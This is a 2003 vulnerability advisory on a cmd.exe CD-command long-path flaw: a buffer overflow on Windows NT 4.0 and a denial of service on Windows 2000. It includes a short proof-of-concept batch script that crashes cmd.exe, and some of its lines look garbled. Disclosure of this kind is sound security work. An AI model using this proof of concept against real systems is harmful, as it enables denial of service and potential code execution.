Title: Buffer overflow/DoS against cmd.exe
for Windows NT 4.0/2000
Affected: Microsoft Windows NT 4.0 (buffer overflow)
Microsoft Windows 2000 (DoS)
Vendor: Microsoft
Risk: Average for Windows NT 4.0
Low for Windows 2000
Exploitable: Yes
Remote: No
Vendor Notified: January, 30 2003
I. Intro
cmd.exe is Windows NT OS family command processor. It's also used to
process .bat and .cmd batch files. Many system administrator run batch
files with elevated privileges for system maintenance.
II. Vulnerability
cmd.exe has a flow in processing cd command on long path name. On
Windows NT 4.0 it may cause buffer overflow, on Windows 2000 - failure
of batch file processing.
III. Details
NTFS file system allows to create paths of almost unlimited length. But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \\?\ prefix may be used
for filename. This is documented feature of Windows API.
cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if
destination path is longer than 256 characters. This vulnerability may
be trivially exploited to execute code.
cmd.exe from Windows 2000 has no buffer overflow, but than changing to
directory with a path slightly longer than 256 characters (for example
260 characters) cmd.exe becomes "jailed" in this directory, it means cd
.. command will fail. It may cause DoS against maintenance batch script.
IV. Exploitation
@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%c:
cd cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
cd BBBBBBBBBBBB*
cd ..
creates directory with 2 subdirectory. First one demonstrates buffer
overflow on Windows NT 4.0 (second cd AAAAAAAAA* command will crash
cmd.exe with EIP overwritten) second one demonstrates cmd.exe to change
directory to AA...\BB..., but cd .. command will fail.
V. Vendor
Microsoft acknowledged problem.
--
http://www.security.nnov.ru
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)